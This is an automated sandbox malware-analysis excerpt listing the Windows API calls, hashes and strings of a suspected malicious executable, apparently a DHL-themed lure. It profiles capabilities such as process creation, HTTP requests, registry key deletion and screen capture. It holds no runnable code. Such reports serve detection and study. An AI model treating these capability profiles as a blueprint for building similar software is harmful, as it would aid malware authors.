                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                            • API String ID: 2055661098-1000479233
                                                                                            • Opcode ID: 079027668007a583b25529f7075c169777fd312c2931a535943c60ab34967418
                                                                                            • Instruction ID: b0e1aeea75d2da7f2cb62a8f9f86ae9ea9e0f1789139cdd22a49db5c3f94c6ba
                                                                                            • Opcode Fuzzy Hash: 079027668007a583b25529f7075c169777fd312c2931a535943c60ab34967418
                                                                                            • Instruction Fuzzy Hash: C8B122716083029FCB10EF28C890E6AB7E5FFA5764F18591CF496C7291E730D886CB92
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 008AB198
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008AB1B0
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008AB1D4
                                                                                            • _wcslen.LIBCMT ref: 008AB200
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008AB214
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008AB236
                                                                                            • _wcslen.LIBCMT ref: 008AB332
                                                                                              • Part of subcall function 008905A7: GetStdHandle.KERNEL32(000000F6), ref: 008905C6
                                                                                            • _wcslen.LIBCMT ref: 008AB34B
                                                                                            • _wcslen.LIBCMT ref: 008AB366
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008AB3B6
                                                                                            • GetLastError.KERNEL32(00000000), ref: 008AB407
                                                                                            • CloseHandle.KERNEL32(?), ref: 008AB439
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AB44A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AB45C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AB46E
                                                                                            • CloseHandle.KERNEL32(?), ref: 008AB4E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2178637699-0
                                                                                            • Opcode ID: 8604b2cb9aa38de834231cae5d2119753c075aaba9f3043645bcf2aab765029c
                                                                                            • Instruction ID: 395e69764b5b5e5b084c35b6bdcb7e3c48d770246e33fec36ef6fb9a77184055
                                                                                            • Opcode Fuzzy Hash: 8604b2cb9aa38de834231cae5d2119753c075aaba9f3043645bcf2aab765029c
                                                                                            • Instruction Fuzzy Hash: E0F179315082509FDB14EF28D891B6ABBE5FF86314F14855DF899DB2A2DB31EC40CB92
                                                                                            APIs
                                                                                            • GetMenuItemCount.USER32(008F1990), ref: 00862F8D
                                                                                            • GetMenuItemCount.USER32(008F1990), ref: 0086303D
                                                                                            • GetCursorPos.USER32(?), ref: 00863081
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0086308A
                                                                                            • TrackPopupMenuEx.USER32(008F1990,00000000,?,00000000,00000000,00000000), ref: 0086309D
                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008630A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                            • String ID: 0
                                                                                            • API String ID: 36266755-4108050209
                                                                                            • Opcode ID: cd4b046b34313598aa8729cf2332c79322b9e582de697fa3ecd308c3df740b84
                                                                                            • Instruction ID: 4d36d9266eed3826280305fc2a3ff7a4541b352b459f6e14514f47cbbf3e33e0
                                                                                            • Opcode Fuzzy Hash: cd4b046b34313598aa8729cf2332c79322b9e582de697fa3ecd308c3df740b84
                                                                                            • Instruction Fuzzy Hash: A2714970640615BFEB319F28DC59FAABF69FF05324F200216F524EA1E1CBB1A950CB91
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?), ref: 008B6DEB
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008B6E5F
                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008B6E81
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008B6E94
                                                                                            • DestroyWindow.USER32(?), ref: 008B6EB5
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00820000,00000000), ref: 008B6EE4
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008B6EFD
                                                                                            • GetDesktopWindow.USER32 ref: 008B6F16
                                                                                            • GetWindowRect.USER32(00000000), ref: 008B6F1D
                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008B6F35
                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008B6F4D
                                                                                              • Part of subcall function 00839944: GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                            • String ID: 0$tooltips_class32
                                                                                            • API String ID: 2429346358-3619404913
                                                                                            • Opcode ID: 5c908e60ee56db38296b7cd67abb62807e60484429db0af0479bafc4abf2b0be
                                                                                            • Instruction ID: 4243e86b87fe9d0374ae784c242b4c81d9381f4d5f355739296737a475e80b91
                                                                                            • Opcode Fuzzy Hash: 5c908e60ee56db38296b7cd67abb62807e60484429db0af0479bafc4abf2b0be
                                                                                            • Instruction Fuzzy Hash: 5A717571604244AFDB20CF28D848EBABBE9FB99304F54051DF989C7360EB74E915CB12
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 008B9147
                                                                                              • Part of subcall function 008B7674: ClientToScreen.USER32(?,?), ref: 008B769A
                                                                                              • Part of subcall function 008B7674: GetWindowRect.USER32(?,?), ref: 008B7710
                                                                                              • Part of subcall function 008B7674: PtInRect.USER32(?,?,008B8B89), ref: 008B7720
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 008B91B0
                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008B91BB
                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008B91DE
                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 008B9225
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 008B923E
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 008B9255
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 008B9277
                                                                                            • DragFinish.SHELL32(?), ref: 008B927E
                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008B9371
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                            • API String ID: 221274066-3440237614
                                                                                            • Opcode ID: ee727764eb3a60173023def158e11665e10a40add2467ccedd0168e6985cec10
                                                                                            • Instruction ID: 882b07c7f91c6c80dbae6145a078486756178aa71cc5a1735179e0997911e313
                                                                                            • Opcode Fuzzy Hash: ee727764eb3a60173023def158e11665e10a40add2467ccedd0168e6985cec10
                                                                                            • Instruction Fuzzy Hash: 6D614971108305AFD701DF64D885DABBBE8FF99750F000A2DF695922A1DB709A49CB62
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0089C4B0
                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0089C4C3
                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0089C4D7
                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0089C4F0
                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0089C533
                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0089C549
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0089C554
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0089C584
                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0089C5DC
                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0089C5F0
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0089C5FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                            • String ID:
                                                                                            • API String ID: 3800310941-3916222277
                                                                                            • Opcode ID: 9b39e60eb03b45ef0bb432e5e3b4f3f512c576fc48c6ee02d4a11269c5563832
                                                                                            • Instruction ID: b9b0d112cd42726212ff6e5d88bf696f3729ef6a9e9e2614ace195a0aa8da9de
                                                                                            • Opcode Fuzzy Hash: 9b39e60eb03b45ef0bb432e5e3b4f3f512c576fc48c6ee02d4a11269c5563832
                                                                                            • Instruction Fuzzy Hash: 1A516CB0600208BFEF21AF65C988AAB7BFCFF08744F044519F946D6610DB72E944DBA1
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 008B8592
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85A2
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85AD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85BA
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 008B85C8
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85D7
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 008B85E0
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85E7
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85F8
                                                                                            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,008BFC38,?), ref: 008B8611
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008B8621
                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 008B8641
                                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 008B8671
                                                                                            • DeleteObject.GDI32(?), ref: 008B8699
                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008B86AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3840717409-0
                                                                                            • Opcode ID: 20bc583f0b41de7e9b86db23167736cd5bbe1b8d3bb852dc5fe590e2257203e0
                                                                                            • Instruction ID: 1d5daf5a1d4363b395712d3595b26e8648db67902bee1c67c4a48b2d2de7ce63
                                                                                            • Opcode Fuzzy Hash: 20bc583f0b41de7e9b86db23167736cd5bbe1b8d3bb852dc5fe590e2257203e0
                                                                                            • Instruction Fuzzy Hash: 6D410975600209EFDB119FA5CC48EAA7BBCFF99715F104159F919E7260DB309901CB60
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00891502
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0089150B
                                                                                            • VariantClear.OLEAUT32(?), ref: 00891517
                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008915FB
                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 00891657
                                                                                            • VariantInit.OLEAUT32(?), ref: 00891708
                                                                                            • SysFreeString.OLEAUT32(?), ref: 0089178C
                                                                                            • VariantClear.OLEAUT32(?), ref: 008917D8
                                                                                            • VariantClear.OLEAUT32(?), ref: 008917E7
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00891823
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                            • API String ID: 1234038744-3931177956
                                                                                            • Opcode ID: cb06ba2234237efc66bb3ab4c5bc5f816881fbb7f3c1b95997639f430d0a81a2
                                                                                            • Instruction ID: 9e919926a52ccd943bcdb2de52db65956d8fa1142b013d0ace2d4548d3b57a9c
                                                                                            • Opcode Fuzzy Hash: cb06ba2234237efc66bb3ab4c5bc5f816881fbb7f3c1b95997639f430d0a81a2
                                                                                            • Instruction Fuzzy Hash: AFD1E131A0811AEBDF00AF69D889B79B7B5FF44704F1A8056F446EB291DB30DD41DBA2
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008AB6AE,?,?), ref: 008AC9B5
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008AC9F1
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA68
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA9E
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008AB6F4
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008AB772
                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 008AB80A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008AB87E
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008AB89C
                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 008AB8F2
                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008AB904
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008AB922
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008AB983
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008AB994
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                            • API String ID: 146587525-4033151799
                                                                                            • Opcode ID: 4a1d3ffe827af83942b1744e688e41e5ace7d63c449fefc858189759cb818979
                                                                                            • Instruction ID: 74658c3b57d3efcd053595631b454b49224004d3b49e35da172b559c92fcf38f
                                                                                            • Opcode Fuzzy Hash: 4a1d3ffe827af83942b1744e688e41e5ace7d63c449fefc858189759cb818979
                                                                                            • Instruction Fuzzy Hash: 00C17D30204241AFE714DF18C494F2ABBE5FF85318F18855CF49A8B6A2DB75ED85CB92
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 008A25D8
                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008A25E8
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 008A25F4
                                                                                            • SelectObject.GDI32(00000000,?), ref: 008A2601
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 008A266D
                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008A26AC
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008A26D0
                                                                                            • SelectObject.GDI32(?,?), ref: 008A26D8
                                                                                            • DeleteObject.GDI32(?), ref: 008A26E1
                                                                                            • DeleteDC.GDI32(?), ref: 008A26E8
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 008A26F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                            • String ID: (
                                                                                            • API String ID: 2598888154-3887548279
                                                                                            • Opcode ID: 4c56c1525d4410b0d9655b766c6339df41343e7264ef574097d7e8a568ed1747
                                                                                            • Instruction ID: e317f491ffa65600fdaad8a63cae396bfc45f060e8f51135c85d91fca7e7c054
                                                                                            • Opcode Fuzzy Hash: 4c56c1525d4410b0d9655b766c6339df41343e7264ef574097d7e8a568ed1747
                                                                                            • Instruction Fuzzy Hash: AE61D175D00219EFDF14CFA8D984AAEBBB5FF48310F208529E955E7250E770A951CFA0
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 0085DAA1
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D659
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D66B
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D67D
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D68F
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6A1
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6B3
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6C5
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6D7
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6E9
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6FB
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D70D
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D71F
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D731
                                                                                            • _free.LIBCMT ref: 0085DA96
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085DAB8
                                                                                            • _free.LIBCMT ref: 0085DACD
                                                                                            • _free.LIBCMT ref: 0085DAD8
                                                                                            • _free.LIBCMT ref: 0085DAFA
                                                                                            • _free.LIBCMT ref: 0085DB0D
                                                                                            • _free.LIBCMT ref: 0085DB1B
                                                                                            • _free.LIBCMT ref: 0085DB26
                                                                                            • _free.LIBCMT ref: 0085DB5E
                                                                                            • _free.LIBCMT ref: 0085DB65
                                                                                            • _free.LIBCMT ref: 0085DB82
                                                                                            • _free.LIBCMT ref: 0085DB9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: fe5c2065ee3ebae3ac6d47f5cd47bdae3af7281c3fc528eb5de6cfccf7fd262a
                                                                                            • Instruction ID: 3ea79b260e6c07ce6985714f27925c397bdbd5ec0b29806bba12cfac4f2621c0
                                                                                            • Opcode Fuzzy Hash: fe5c2065ee3ebae3ac6d47f5cd47bdae3af7281c3fc528eb5de6cfccf7fd262a
                                                                                            • Instruction Fuzzy Hash: 44314D316047059FEB32AA39E845F967BE9FF01322F554419EC49E7291DF31AC48C722
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0088369C
                                                                                            • _wcslen.LIBCMT ref: 008836A7
                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00883797
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0088380C
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0088385D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00883882
                                                                                            • GetParent.USER32(?), ref: 008838A0
                                                                                            • ScreenToClient.USER32(00000000), ref: 008838A7
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00883921
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0088395D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                            • String ID: %s%u
                                                                                            • API String ID: 4010501982-679674701
                                                                                            • Opcode ID: 2c6b042df18f8c07d307d9924c054a7126b595b3be7280f03945331fd9b9aa41
